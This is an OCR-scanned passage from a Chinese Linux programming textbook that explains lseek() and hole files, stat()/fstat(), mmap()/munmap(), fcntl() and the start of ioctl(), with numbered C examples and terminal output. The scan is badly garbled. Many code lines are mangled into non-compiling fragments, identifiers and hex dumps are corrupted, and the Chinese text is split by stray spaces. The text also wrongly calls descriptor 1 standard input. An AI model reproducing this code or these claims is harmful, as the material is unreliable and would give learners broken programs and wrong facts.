off t cur pos = lseek(fd, 0, SEEK _ CUR); 


上 面 的 函数 没有 引起 文件 的 副作用 ， 仅 仅 检验 了 文件 的 偏 移 设置 函数 获得 当前 的 文件 
偏 移 量 的 值 ， 可 以 用 这 种 方法 测试 当前 的 设备 是 否 支 持 lseek() 函 数 。 


2. lseek() 函 数 的 通用 例子 


下 面 的 代码 测试 标准 输入 是 否 支 持 lseekO 操 作 。 程 序 中 对 标准 输入 〈stdin) 进行 偏 移 
操作 (lseek)， 根 据 系统 的 返回 值 判 断 是 否 可 以 对 标准 输入 进行 偏 移 操作 。 


01 /* 文 件 lseek-01.c, 使 用 1lseek 函数 测试 标准 输入 是 否 可 以 进行 seek 操作 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <unistd.h> 

05 #include <fcnt1.h> 

06 #include <stdio.h> 

07 int main(void) 


09 oF EE OFfSet w= =] 

10 

11 

1 offset = lseek(1，0，SEEK CUR); /* 将 标准 输入 文件 描述 符 的 文件 偏 移 量 


设 为 当前 值 */ 


。81 。 


第 1 篇 Linux 网 络 开发 基础 


if(-1 == offset) { /* 设 置 失 败 ,标准 输入 不 能 进行 seek 操作 */ 
14 printf ("STDIN can't seek\n"); 

15 return -1; 

16 }elsel{ /* 设 置 成 功 , 标准 输入 可 以 进行 seek 操作 */ 
17 printf ("STDIN CAN seek\n"); 

18 }; 

19 return 0; 

ZO 


上 面 代码 中 的 1 是 标准 输入 stdin》 的 文件 描述 符 。 编 译 执行 此 代码 可 知 ， 标 准 输入 
不 能 进行 lseek() 操 作 。 
$gcc -o lseek-01 lseek-01.c 


$ ./lseek-01 
STDIN can't seek 


3. 空洞 文件 的 例子 


lseek() 函 数 对 文件 偏 移 量 的 设置 可 以 移出 文件 ， 即 设置 的 位 置 可 以 超出 文件 的 大 小 ， 
日 是 这 个 位 置 仅仅 在 内 核 中 保存 , 并 不 引起 任何 的 IO 操作 。 当 下 一 次 的 读 写 动作 时 , lseekO 
设置 的 位 置 就 是 操作 的 当前 位 置 。 当 对 文件 进行 写 操作 时 会 延长 文件 ， 跳 过 的 数据 用 "0" 
填充 ， 这 在 文件 中 造成 了 一 个 空洞 。 

例如 建立 一 个 文件 在 开始 的 部 分 写 入 8 个 字 节 “01234567”， 然 后 到 32 的 地 方 在 写 
8 个 不 同 的 字 节 ABCDEFGH, 文件 会 形成 表 3.3 所 示 的 情况 。 下 面 的 代码 是 造成 上 述 ms 
文件 空洞 的 一 个 实例 。 
表 3.3 空洞 文件 的 内 容 


oo ojo lo folos [ol oo lw nnniuls 
oooo0| of1 2 4 ls sl7olololololololn 
0000020 | 0 加 而 
oo |^A|blclplslrlclal | 了 


01 /x* 文 件 1seek-02.c, 使 用 lseek () 函数 构建 空洞 文件 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <unistd.h> 

05 #include <fcntl.h> 

06 #include <stdio.h> 

07 int main(void) 


08 { 

09 int fd = =1? 

10 ssize t size = -1? 

入 十 off t offset = =1;» 

12 char buf1[]="01234567"; /* 存 放 数 据 的 缓冲 区 */ 

13 char buf2[]="ABCDEFGH"; 

14 char filename[] = "hole.txt"; Weve 

3 int len = 8; 

16 

ha fd = open (filename,O RDWR|IO CREAT,S IRWXU); /* 创 建文 件 
hole.txt*/ 

18 2 sa £0) /* 创 建文 件 失败 */ 

19 return 一 1 

20 
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21 
2 size = write(fd，bufl,len); /* 将 bufl 中 的 数据 写 入 到 文件 Hole.txt 中 */ 
3 if(size != len){ /* 写 入 数据 失败 */ 

24 return -1; 

25 } 

26 

加 offset = lseek(fd，32，SEEK SET) ; /* 设 置 文件 偏 移 量 为 绝对 值 的 32*/ 

28 if(-1 == offset)t{ /* 设 置 失败 */ 

29 return -1; 

30 } 

31 

32 size = write(fd，buf2,1len); /* 将 buf2 中 的 数据 写 入 到 文件 hole.txt 中 */ 
33 if/(size != len)t /* 写 入 数据 失败 */ 

34 return -1; 

35 } 

36 

37 close (fd); 7* 关 闭 文件 */ 

38 return 0; 

39 1} 


将 代码 保存 到 文件 lseek-02.c 中 并 编译 运行 : 

$gcc -o lseek-02 lseek-02.c 

./lseek-02 

生成 了 hole.txt 文件 ， 文 件 的 大 小 为 40 字 节 。 用 十 六 进 制 工具 od 查看 生成 的 hole.txt 
文件 内 容 : 

$ od -c hole.txt 

DOD 0 0 3 NO NO NO NONNOT NO NO No. 

0000020 \0 \0 \0 \0 NO \0 NO NO NO \0 \0 NO \0 NO \0 NO 

0000040” RN BB CC DE EF G6 H 

0000050 

0 一 7 的 位 置 用 bufl 中 的 内 容 填充 ， 中 间 的 24 的 未 写字 节 即 在 8 一 32 个 字 节 的 位 置 上 
均 为 "0"， 即 进行 偏 移 造成 的 文件 空洞 ，33 一 39 是 buf2 的 内 容 。 


3.2.7 ”获得 文件 状态 fstat() 函 数 


有 的 时 候 对 文件 操作 的 目的 不 是 读 写 文件 ， 而 是 要 获得 文件 的 状态 。 例 如 ， 获 得 目标 
文件 的 大 小 、 权 限 、 时 间 等 信息 。 


1. fstat() 函 数 介绍 


在 程序 设计 的 时 候 经 常 要 用 到 文件 的 一 些 特性 值 ， 例 如 文件 的 所 有 者 、 文 件 的 修改 时 
间 、 文 件 的 大 小 等 。stat() 函 数 、fstat0 函 数 和 lstat() 函 数 可 以 获得 文件 的 状态 ， 其 函数 原型 
如 下 : 

#include <sys/types.h> 

#include <sys/stat.h> 

#include <unistd.h> 

int stat(const char *path, struct stat *buf); 

int fstat(int filedes, struct stat *+buf) 

int lstat(const char *path, struct stat *buf); 
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函数 的 第 一 个 参数 是 文件 描述 的 参数 ， 可 以 为 文件 的 路 径 或 者 文件 描述 符 ; buf 为 指 
向 struct stat 的 指针 ， 获 得 的 状态 从 这 个 参数 中 传 回 。 当 函数 执行 成 功 时 返回 0， 返 回 值 为 
-1 表示 有 错误 发 生 。 

结构 struct stat 为 一 个 描述 文件 状态 的 结构 ， 定 义 如 下 : 


struct stat { 


dev 七 st dev; /* 此 文件 所 处 设备 的 设备 ID 号 */ 
ino 七 st_inoy /*inode 数值 */ 

mode t st_mode; /* 保 护 设 置 */ 

nlink t st nlink; /* 硬 链接 数 */ 

aaQEE st uid; /* 文 件 所 有 者 的 ID*/ 
gid 七 st_gid; /* 文 件 所 有 者 的 组 ID*/ 
dev t st_rdev; /* 以 字 节 计 的 大 小 */ 
blksize t st blksize; /* 文 件 系统 的 块 大 小 */ 
blkcnt t st_blocks; /* 占 用 的 块 的 数量 */ 
time t st atime; /* 最 后 方位 时 间 */ 
time t st mtime; /* 最 后 修改 时 间 */ 
time t st ctime; /* 最 后 状态 改变 时 间 */ 


}; 


2. stat() 函 数 的 例子 
下 面 的 代码 为 获得 文件 状态 的 实例 ， 获 得 文件 test.txt 的 状态 并 将 状态 值 打印 出 来 。 


/* 文 件 fstat-01.c, 使 用 stat 获得 文件 的 状态 */ 
#include <sys/types.h> 
#include <sys/stat.h> 
#include <unistd.h> 
int main (void) 
‘ 
struct stat st; 


if( -1 == stat("test.txt", &st))t /* 获 得 文件 的 状态 ,将 状态 值 放 入 st 中 */ 
printf ("获得 文件 状态 失败 \n") ; 
return -1; 


上 


printf ("包含 此 文件 的 设备 ID: S$d\n",st.st dev); /* 文 件 的 ID 号 */ 
printf ("此 文件 的 节点 : $d\n",st.st ino); /* 文 件 的 节点 */ 
printf ("此 文件 的 保护 模式 : %d\n", st.st mode); /* 文 件 的 模式 */ 
Printf(" 此 文件 的 硬 链接 数 : $d\n", st.st_nlink); /* 文 件 的 硬 链接 数 */ 
printf ("此 文件 的 所 有 者 ID: Sd\n",st.st uid); /* 文 件 的 所 有 者 ID*/ 


printf ("此 文件 的 所 有 者 的 组 ID: $d\n",st.st gid); /* 文 件 的 组 TD*/ 
printf ("设备 ID (如果 此 文件 为 特殊 设备 ): sd\n", st.st_rdev); /* 文 件 的 设备 ID*/ 


printf ("此 文件 的 大 小 : $d\n",st.st_ size); /* 文 件 的 大 小 */ 
printf ("此 文件 的 所 在 文件 系统 块 大 小 : %d\n", st.st_blksize); /* 文 件 的 系统 块 大 小 */ 
printf ("此 文件 的 占用 块 数量 : $d\n", st.st blocks); /* 文 件 的 块 大 小 */ 


printf ("此 文件 的 最 后 访问 时 间 : $d\n", st.st atime); /* 文 件 的 最 后 访问 时 间 */ 
printf ("此 文件 的 最 后 修改 时 间 : $d\n",st.st mtime); /* 文 件 的 最 后 修改 时 间 */ 
printf ("此 文件 的 最 后 状态 改变 时 间 : $d\n", st. st_ctime) ;/* 文 件 的 最 后 状态 改变 时 间 */ 


return 0; 
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} 
将 代码 保存 在 fstat-01.c 文件 中 ， 编 译 并 运行 : 


$gcc =o fstat=01 fstat-01.c 
$./fstat-01 

包含 此 文件 的 设备 ID: 2049 

此 文件 的 节点 : 1058718 

此 文件 的 保护 模式 : 33204 

此 文件 的 硬 链接 数 : 1 

此 文件 的 所 有 者 ID: 1000 

此 文件 的 所 有 者 的 组 ID: 1000 

设备 ID (如 果 此 文件 为 特殊 设备 ) : 0 
此 文件 的 大 小 : 51 

此 文件 的 所 在 文件 系统 块 大 小 : 4096 
此 文件 的 占用 块 数量 : 8 

此 文件 的 最 后 访问 时 间 : 1369985914 
此 文件 的 最 后 修改 时 间 : 1369984366 
此 文件 的 最 后 状态 改变 时 间 : 1369985914 


从 上 面 的 打印 可 知道 ， 当 前 系统 中 每 个 块 的 大 小 为 4096 字 节 ， 文 件 test.txt 大 小 为 50 
字 节 ， 占 用 了 一 个 块 。 


3.2.8 文件 空间 映射 mmap() 函 数 


mmap() 函 数 用 来 将 文件 或 者 设备 空间 映射 到 内 存 中 ,可 以 通过 对 映射 后 的 内 存 空 间 存 
取 来 获得 与 存 取 文 件 一 致 的 控制 方式 ， 不 必 再 使 用 read0 函 数 、write() 函 数 。 简 单 地 说 ， 此 
函数 就 是 将 文件 映射 到 内 存 中 的 某 一 段 ， 内 存 比 磁盘 快 些 。 映 射 到 的 内 存 并 不 占用 空间 ， 
仅仅 占用 一 段 地 址 空间 。 


1. mmap() 函 数 介绍 


mmap() 函 数 的 原型 如 下 ， 它 将 文件 描述 符 乌 对 应 的 文件 中 ， 自 offset 开始 的 一 段 长 
length 的 数据 空间 映射 到 内 存 中 。 用 户 可 以 设 定 映射 内 存 的 地 址 ， 但 是 具体 函数 会 映射 到 
内 存 的 位 置 由 返回 值 确定 。 当 映射 成 功 后 ， 返 回 映射 到 的 内 存 地 址 。 如 果 失 败 返 回 值 为 
(void*)-1。 通 过 errno 值 可 以 获得 错误 方式 。 

#include <sys/mman.h> 


void *mmap (void *start, size t length, int prot, int flags, 
int fd, off t offset); 


mmap() 函 数 进行 地 址 映射 的 时 候 ， 用 户 可 以 指定 要 映射 到 的 地 址 ， 这 个 地 址 在 参数 
start 中 指定 ， 通 常 为 NULL， 表 示 由 系统 自己 决定 映射 到 什么 地 址 。 而 参数 length 表示 映 
射 数据 的 长 度 ， 即 文件 需要 映射 到 内 存 中 的 数据 大 小 。 使 用 mmap() 函 数 有 一 个 限制 ， 只 能 
对 映射 到 内 存 的 数据 进行 操作 ， 即 限制 于 开始 为 offset、 大 小 为 len 的 区 域 。 参 数 得 ， 代 表 
文件 的 文件 描述 符 ， 表 示 要 映射 到 内 存 中 的 文件 ， 通 常 是 open() 函 数 的 返回 值 ， 如 果 需 要 
对 文件 中 需要 映射 地 址 进行 偏 移 ， 则 在 参数 offset 中 进行 指定 。 

mmap() 函 数 的 参数 prot， 表 示 映 射 区 保护 方式 。 保 护 方式 prot 的 值 是 一 个 组 合 值 ， 可 
选 如 下 的 一 个 或 者 多 个 。 这 些 值 可 以 进行 复合 运算 ， 其 中 ，PROT _EXEC 表示 映射 区 域 可 
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执行 ，PROT READ 表示 映射 区 域 可 读 取 ，PROT WRITE 表示 映射 区 域 可 写 入 ， 
PROT_NONE 表示 映射 区 域 不 能 存 取 。 例 如 PROT_WRITEIPROT_READ 的 方式 将 映射 区 
设置 为 可 读 写 ， 当 然 prot 的 设置 受 文件 打开 时 的 选项 限制 ， 当 打开 文件 时 为 只 读 ， 则 上 面 
的 写 (PROT_WRITE) 失效 ， 但 是 读 仍然 有 效 。 
参数 flags 用 于 设 定 映射 对 象 的 类 型 、 选 项 和 是 否 可 以 对 映射 对 象 进行 操作 ( 读 写 等 )， 
这 个 参数 和 open() 函 数 中 的 含义 类 似 。 参 数 flags 也 是 一 个 组 合 值 ， 下 面 是 其 可 选 的 设置 。 
口 MAP_ FIXED: 如 果 参 数 start 指定 了 用 于 需要 映射 到 的 地 址 , 而 所 指 的 地 址 无 法 成 
功 建立 映射 ， 则 映射 失败 。 通 常 不 推荐 使 用 此 设置 ， 而 将 start 设 为 0， 由 系统 自 
动 选取 映射 地 址 。 
口 MAP_SHARED: 共享 的 映射 区 域 ， 映射 区 域 允许 其 他 进程 共享 ， 对 映射 区 域 写 入 
数据 将 会 写 入 到 原来 的 文件 中 。 
口 MAP_PRIVATE: 当 对 映射 区 域 进行 写 入 操作 时 会 产生 一 个 映射 文件 的 复制 ， 即 
写 入 复制 (copy on write) ， 而 读 操 作 不 会 影响 此 复制 。 对 此 映射 区 的 修改 不 会 写 
回 原来 的 文件 ， 即 不 会 影响 原来 文件 的 内 容 。 
口 MAP_ ANONYMOUS: 建立 匿名 映射 。 此 时 会 忽略 参数 fd4， 不 涉及 文件 ， 而 且 映 
射 区 域 无 法 和 其 他 进程 共享 。 
口 MAP_DENYWRITE: 对 文件 的 写 入 操作 将 被 禁止 ， 只 能 通过 对 此 映射 区 操作 的 方 
式 实现 对 文件 的 操作 ， 不 允许 直接 对 文件 进行 操作 。 
口 MAP_LOCKED: 将 映射 区 锁定 ， 此 区 域 不 会 被 虚拟 内 存 重 置 。 
参数 flags 必须 为 MAP_SHAED 或 者 MAP_PRIVATE 二 者 之 一 的 类 型 .MAP_SHARED 
类 型 表示 多 个 进程 使 用 的 是 一 个 内 存 映 射 的 副本 ， 任 何 一 个 进程 都 可 对 此 映射 进行 修改 ， 
其 他 的 进程 对 此 修改 是 可 见 的 。 而 MAP_PRIVATE 则 是 多 个 进程 使 用 的 文件 内 存 映 射 ， 在 
写 入 操作 后 ， 会 复制 一 个 副本 给 修改 的 进程 ， 多 个 进程 之 间 的 副本 是 不 一 致 的 。 


2. munmap() 函 数 介绍 


与 mmap() 函 数 对 应 的 函数 是 munmap() 函 数 , 它 的 作用 是 取消 mmap() 函 数 的 映射 关系 。 
其 函数 原型 如 下 : 


#include <sys/mman.h> 
int munmap (void *start, size t length); 


参数 start 为 mmap() 函 数 成 功 后 的 返回 值 ， 即 映射 的 内 存 地 址 ; 参数 length 为 映射 的 
长 度 。 

使 用 mmap() 函 数 需要 遵循 一 定 的 编程 模式 ， 其 模式 如 下 : 首先 使 用 open0 函 数 打 开 一 
个 文件 ， 当 操作 成 功 的 时 候 会 返回 一 个 文件 描述 符 ; 使 用 mmap() 函 数 将 此 文件 描述 符 所 代 
表 的 文件 映射 到 一 个 地 址 空间 ， 如 果 映 射 成 功 ， 会 返回 一 个 映射 的 地 址 指针 ， 对 文件 的 操 
作 可 以 通过 mmap0 函 数 映射 的 地 址 来 进行 , 包括 读数 据 、 写 数据 、 偏 移 等 ， 与 一 般 的 指针 
操作 相同 ， 不 过 要 注意 不 要 进行 越界 操作 ; 当 对 文件 的 操作 完毕 后 ， 需 要 使 用 munmap0 
函数 将 mmap() 函 数 映射 的 地 址 取消 并 关闭 打开 的 文件 。 

/* 打 开 文 件 */ 


fd = open (filename, flags, mode); 
ENE 
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. . . (错误 处 理 ) 
ptr = mmap (NULL, len, PROT READ|PROT WRITE,MAP SHARED, fd, 0); 


/* 对 文件 进行 操作 */ 
/* 取 消 映射 关系 */ 
munmap (ptr, len); 


/* 关 闭 文件 */ 
close (fd); 


3. mmap() 函 数 和 munmap() 函 数 的 例子 
下 面 的 代码 是 一 个 使 用 mmap(0) 函 数 映射 文件 的 实例 。 先 打开 文件 mmap.txt， 并 使 用 


mmap() 函 数 进行 地 址 空间 影射 ， 当 映射 成 功 后 会 对 文件 映射 地 址 区 域 进行 memsetO 函 数 操 
作 ， 然 后 返回 。 程 序 运行 后 会 发 现 对 内 存 地 址 的 操作 都 显示 在 文件 中 。 


01 /* 文 件 mmap-01.c, 使 用 mmap 对 文件 进行 操作 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <fcntl.h> 

05 #include <unistd.h> 

06 #include <sys/mman.h>/*mmap*/ 

07 #include <string.h>/*memset warning*/ 
08 #include <stdio.h> 

09 #define FILELENGTH 80 

10 int main(void) 


he 
12 int Fd. = =1 
下 char buf[]="quick brown fox jumps over the lazy dog"; 
/* 将 要 写 入 文件 的 字符 串 */ 
14 char *ptr = NULL; 
EE 
16 /* 打 开 文件 mmap .txt, 并 将 文件 长 度 缩小 为 0， 
7 如 果 文件 不 存在 则 创建 它 , 权限 为 可 读 写 执行 */ 
18 fd = open("mmap.txt"，O_RDWR/* 可 读 写 */10_CRERATV* 不 存在 ,创建 */10_ 
TRUNCV* 缩 小 为 0*/，S_IRWXU); 
19 eal EEG) /* 打 开 文 件 失败 ,退出 */ 
20 return -1; 
2 } 
有 /* 下 面 的 代码 将 文件 的 长 度 扩大 为 80*/ 
23 /* 向 后 偏 移 文件 的 偏 移 量 到 79*/ 
24 lseek (fd, FILELENGTH-1, SEEK SET); 
Ea 
26 writel(fd, ran 1) /* 随 意 写 入 一 个 字符 , 此 时 文件 的 长 度 为 80*/ 
23 
28 /* 将 文件 mmap .txt 中 的 数据 段 从 开头 到 1M 的 数据 映射 到 内 存 中 , 对 文件 的 操作 立刻 显 
示 在 文件 上 , 可 读 写 */ 
vt Ptr = (char*)mmap (NULL, FILELENGTH, PROT READ |PROT WRITE,MAP 
SHARED, fd, 0); 
30 if( (char*)-1 =- ptr){ /* 如 果 映 射 失败 , 则 退出 */ 
31 printf ("mmap failure\n"); 
3 close (fd); 
全 民 ; return -1; 
34 } 
35 
36 memcpy (ptr+16, buf, strlen(buf)); 


/* 将 buf 中 的 字符 串 复制 到 映射 区 域 中 , 起 始 地 址 为 ptr 偏 移 16*/ 
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37 munmap (Ptr, FILELENGTH); /* 取 消 文 件 映射 关系 */ 
38 close (fd); /* 关 闭 文件 */ 

39 

40 return 0; 

41 } 


上 述 代码 首先 利用 函数 lseek() 偏 移 到 80, 将 文件 的 大 小 扩展 为 80, 并 写 入 一 个 字符 a， 


将 文件 形成 一 个 空洞 文件 。 然后 将 文件 从 开始 到 结尾 的 80 个 字 节 映射 到 内 存 空间 ， 


并 将 地 


址 传 给 ptr。 把 buf 中 的 字符 串 quick brown fox jumps over the lazy dog 复制 到 ptr 后 面 16 字 


节 开 始 的 空间 后 取消 映射 ， 并 关闭 文件 。 
将 代码 存 入 文件 mmap-01.c 中 ， 编 译 并 运行 文件 : 


$gcc -o mmap ex03-mmap-01.c 
$./mmap 


会 发 现 当前 目录 下 多 了 一 个 名 为 mmap.txt 的 文件 ， 用 ls 查看 ， 大 小 为 80 字 节 。 


$ 1s -1 mmap.txt 
= = 1 linux-c linux-c 80 5 月 31 15:52 mmap.txt 


使 用 十 六 进 制 查看 mmap.txt 对 应 的 ASCII 码 : 


$ od -c mmap.txt 


0000000 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 


0000020 gq we 大 bo wn or x 
0000040 2 mp 3 A 二 Eh 二 
0000060 og NO NOMNON NOTINOPT NO NO NO ND 


0000100 \0 \0 vo \0 Ko MOP NO NOR NO NO NOV NOP NO NOP YYOD 


0000120 


3.2.9 文件 属性 fcntl() 函 数 
fentl() 函 数 用 于 获得 和 改变 已 经 打开 文件 的 性 质 。 
1. fcntl() 函 数 介 绍 
fentlO) 函 数 向 打开 的 文件 得 发 送 命令 ， 更 改 其 属性 。 函 数 原 型 如 下 : 
#include <unistd.h> 
#include <fcntl.h> 
dnt Tontilint fd nt cco)s 


dnt fentl(int fds int cmd, long arg)y 
dint fcntl(int fdr int cmdy Gtruct flock *Lock}s 


如 果 操作 成 功 ， 其 返回 值 依赖 于 cmd， 如 果 出 错 返 回 值 为 -1。 下 面 的 4 个 命令 有 特殊 


的 返回 值 : F_DUPFD, F_GETFD, F_GETFL,， 以 及 F_GETOWN。 第 1 个 命令 返回 值 为 新 


的 文件 描述 符 ， 第 2 个 命令 返回 值 为 获得 的 相应 标识 ， 第 3 个 命令 返回 值 为 文件 


区 述 符 的 


状态 标志 ， 第 4 人 ID 号 ， 如 果 为 负数 则 是 进程 组 ID 号 。 
在 本 节 的 各 实例 中 ,第 3 一 个 整数 ， 但 是 某 些 情况 下 使 用 记录 锁 时 ， 第 3 


个 参数 则 是 一 个 指向 结构 的 指 
函数 fcntl0 的 功能 分 为 6 类 : 
口 复制 文件 描述 符 (cmd=F_DUPFD) ; 
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口 获得 /设置 文件 描述 符 (cmd=F_GETFD 或 者 F_SETFD) ; 
口 获得 /设置 文件 状态 值 (cmd=F_GETFL 或 者 F_SETFL) ; 
口 获得 /设置 信号 发 送 对 象 (cmd=F GETOWN、F_SETOWN 、F_GETSIG 或 者 


F_SETSIG ); 

口 获得 /设置 记录 锁 (cmd=F_GETLK、F_SETLK 或 者 F_SETLKW) ; 

口 获得 /设置 文件 租约 (cmd=F_GETLEASE 或 者 F_SETLEASE) 。 

本 书 中 对 常用 的 前 面 4 类 进行 简单 地 介绍 ， 记 录 锁 和 文件 租约 的 获取 和 设置 请 读者 查 

阅 相 关 资 料 。 

口 F_DUPFD: 命令 用 于 复制 文件 描述 符 包 ， 获 得 的 新 文件 描述 符 作为 函数 值 返回 。 
获得 的 文件 描述 符 是 尚未 使 用 的 文件 描述 符 中 大 于 或 等 于 第 3 个 参数 值 中 的 最 
小 值 。 

口 F_GETFD: 获得 文件 描述 符 。 

口 F_ SETFD: 设置 文件 描述 符 。 

口 F_GETFL: 标志 获得 文件 描述 符 fd 的 文件 状态 标志 , 标志 的 含义 在 表 3.4 中 列 出 。 


表 3.4 fcntl 的 文件 状态 标志 值 及 含义 


文件 状态 值 
O RDONLY 
O_WRONLY 
O RDWR 
O APPEND 写 入 是 添加 至 文件 末尾 


由 于 3 种 存 取 方 式 (O_RDONLY、O_WRONLY 和 O_RDWR) 并 不 是 各 占 1 位, 这 3 
个 值 分 别 为 0、1、2， 要 正确 地 获得 它们 的 值 ， 只 能 用 O_ACCMODE 获得 存 取 位 ， 然 后 与 
这 3 种 方式 比较 。 


2.F_GETFL 的 例子 
下 面 的 代码 为 使 用 F_GETFL 的 实例 ， 获 得 标准 输入 的 存 取 方 式 ， 并 打印 出 来 : 


01 /* 文 件 fcnt1-01.c, 使 用 fcnt1 控制 文件 符 */ 
02 #include <unistd.h> 

03 #include <fcntl.h> 

04 #include <stdio.h> 

05 int main(void) 


06 { 

07 int flags. =-—1» 

08 int accmode = -1; 

09 

10 flags = fent1(0, F GETFL, 0); /* 获 得 标准 输入 的 状态 的 状态 */ 
站 ERETLags 有 30 /* 错 误 发 生 */ 

下 有 printf ("failure to use fcntl\n"); 

a return =1> 

14 } 

下 SS 

16 

Ty accmode = flags & O ACCMODE; /* 获 得 访问 模式 */ 
18 if(accmode == O_RDONLY) /* 只 读 */ 
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19 printf ("STDIN READ ONLY\n"); 

20 else if(accmode == O_ WRONLY) WS 

全 业 printf ("STDIN WRITE ONLY\n"); 

2 else if(accmode ==0O RDWR) /* 可 读 写 */ 
必 3 printf ("STDIN READ WRITENn") 

24 else /* 其 他 模式 */ 
25 printf ("STDIN UNKNOWN MODE"); 

26 

2 if( flags & O_APPEND ) /* 附 加 模式 */ 
28 printf ("STDIN APPEND\n"); 

29 if( flags & O_ NONBLOCK ) /* 非 阻塞 模式 */ 
30 printf ("STDIN NONBLOCK\n"); 

31 

32 return 0; 

El ll 


将 代码 存 入 文件 fentl-01.c 中 ,编译 并 运行 文件 ， 获 得 了 标准 的 输入 状态 , 说 明 标 准 输 
入 是 可 读 写 的 ， 
$gcc -o fcntl-01 fcntl-01.c 


$ ./fcntl-01 
STDIN READ WRITE 


3. F_SETFL 的 例子 


F_SETFL 设置 文件 状态 标志 的 值 ， 此 时 用 到 了 第 3 个 参数 。 其 中 O_ RDONLY、 
O_WRONLY、O_RDWR、0O_CREAT、O_EXCL、O_NOCTTY 和 O_TRUNC 不 受 影响 ， 
可 以 更 改 的 几 个 标志 是 O_APPEND、O_ASYNC、O_SYNC、O_DIRECT、O_NOATIME 
和 ONONBLOCK。 

如 下 代码 为 修改 文件 状态 值 的 一 个 实例 ， 在 文本 文件 testtxt 中 的 内 容 是 
“1234567890abcdefg”。 打 开 文 件 test.txt 时 设置 为 O_RDWR， 此 时 文件 的 偏 移 量 位 于 文件 
开头 ， 修 改 状态 值 的 时 候 增加 O_APPEND 项 ， 此 时 文件 的 偏 移 量 移 到 文件 末尾 ， 写 入 字 
符 串 FCNTL， 然 后 关闭 文件 。 

01 /* 文 件 fcnt1-02.c, 使 用 fcntl 修改 文件 的 状态 值 */ 

02 #include <unistd.h> 


03 #include <fcntl.h> 
04 #include <stdio.h> 


05 #include <string.h> /xstrlen() 函数 */ 
06 int main(void) 

or 

08 int flags = -1; 

09 char buf[] = "FCNTL"; 

10 int fd = open("test.txt", O RDWR); 

Et flags = fentl(fd, F GETFL, 0); /* 获 得 文件 状态 */ 

2 

13 flags |= O_APPEND; /* 增 加 状态 为 可 追加 */ 
14 flags = fentl(fd, F SETFL, &flags); /* 将 状态 写 入 */ 

Ms Eads Ot /* 错 误 发 生 */ 

16 printf ("failure to use fcntl\n"); 

生字 return -1; 

18 } 

19 write (fd, buf, strlen(buf)); /* 向 文件 中 写 入 字符 串 */ 
20 close(fd) 
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21 
22 return 0; 
2 


将 代码 存 入 文件 fentl-02.c 中 ， 编 译 此 文件 : 


$gcc -o fctn1-02 fcntl-02.c 


没有 运行 fctn1-02 之 前 ，test.txt 文件 中 的 内 容 如 下 : 


$ od -c test.txt 

0000000 1 23 5 6 97° 8 9 0 a “bw "de 
0000020 g 

0000021 


运行 fctnl-02， 并 检查 文件 test.txt 中 的 内 容 : 


$./fcnt1l-02 

$ od -c test.txt 

0000000 0 0 8° "9 0 ‘a bee qd e f 
0000020 gxn F CN T L 

0000027 


可 见 ， 修 改 状 态 后 的 flags=fentl(fd,F_SETFL ,flags); 函 数 起 了 作用 ， 文 件 的 状态 已 经 增 
加 了 O_APPEND 的 属性 ， 文 件 的 偏 移 量 发 生 了 变化 ， 移 到 了 文件 test.txt 的 末尾 。 


4. F_GETOWN 的 例子 


F_GETOWN 获得 接收 信号 SIGIO 和 SIGURG 信号 的 进程 ID 或 进程 组 ID。 例 如 ， 如 
下 代码 得 到 接收 信号 的 进程 ID 号 。 
01 /* 文 件 fcnt1-04.c, 使 用 fcnt1l 获得 接收 信号 的 进程 ID*/ 


02 #include <unistd.h> 
03 #include <fcnt1.h> 
04 #include <stdio.h> 
05 int main(void)t{ 


06 int uid; 

07 int fd = open("test.txt", O RDWR); /* 打 开 文件 test.txtx/ 
08 

09 uid = fentl (fd, F_GETOWN); /* 获 得 接收 信号 的 进程 TD*/ 
10 printf ("the SIG recv ID is %d\n",uid); 

hi 

4 close (fd) ; 

让 3 return 0; 

1 


5. F_SETOWN 的 例子 


F_SETOWN 用 于 设置 接收 信号 SIGIO 和 SIGURG 信号 的 进程 ID 或 进程 组 ID 。 参 数 
arg 为 正 时 设置 接收 信号 的 进程 ID，arg 的 值 为 负 值 时 设置 接收 信号 的 进程 组 ID 为 arg 绝 
对 值 。 下 面 的 代码 将 文件 test.txt 的 信号 接收 设置 给 进程 10000。 

01 /* 文 件 fcnt1-05.c, 使 用 fcnt1 设置 接收 信号 的 进程 ID*/ 

02 #include <unistd.h> 


03 #include <fcnt1.h> 
04 #include <stdio.h> 
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05 int main(void){ 


06 int uid; 

07 int fd = open("test.txt", O RDWR); /* 打 开 文件 test .txt*/ 
08 

09 uid = fentl(fd, F_ SETOWN,10000); /* 设 置 接收 信号 的 进程 ID*/ 
10 

11 close (fd); 

12 return 0; 

We 


3.2.10 文件 输入 输出 控制 ioctl() 函 数 


ioctl 是 input output control 的 简写 ， 表 示 输 入 输出 控制 ，ioctl0 函 数 通 过 对 文件 描述 符 
的 发 送 命令 来 控制 设备 。 


1. ioctl() 函 数 介绍 


ioctlO 函 数 的 原型 如 下 ，ioctl0 函 数 通过 对 文件 描述 符 发 送 特定 的 命令 来 控制 文件 描述 
符 所 代表 的 设备 。 参 数 d 是 一 个 已 经 打开 的 设备 。 通 常情 况 下 ioctl() 函 数 出 错 返 回 -1， 成 
功 则 返回 0 或 者 大 于 1 的 值 ， 取 决 于 对 应 设备 的 驱动 程序 对 命令 的 处 理 。 

#include <sys/ioctl.h> 

dnt ioctl(int ds int requesty wor)? 

使 用 ioctl0 像 其 他 的 系统 调用 一 样 : 打开 文件 ， 发 送 命令 ， 查 询 结果 。ioctlO) 函 数 像 一 
个 杂货 铺 ， 对 设备 的 控制 通常 都 通过 这 个 函数 来 实行 。 具 体 对 设备 的 操作 方式 取决 于 设备 
驱动 程序 的 编写 。 


2. ioctl() 函 数 的 例子 


下 面 是 一 个 控制 CDROM 打开 的 简单 程序 , 因为 CDROM 控制 程序 的 数据 结构 在 头 文 
件 <linux/cdrom.h> 中 ,所 以 要 包含 此 文件 。 此 处 使 用 ioctlO0 函 数 ， 仅 仅 发 送 特定 的 打开 命令 
到 Linux 内 核 程 序 , 用 CDROMEJECT 函数 本 身 就 可 以 进行 区 分 , 所 以 没有 传 入 配置 数据 。 

01 /* 文 件 ioct1-01.c 控制 CDROMx / 

02 #include <linux/cdrom.h> 

03 #include <stdio.h> 


04 #include <fcntl.h> 
05 int main(void){ 


06 
07 int fd = open("/dev/cdrom",O RDONLY|O NONBLOCK); 
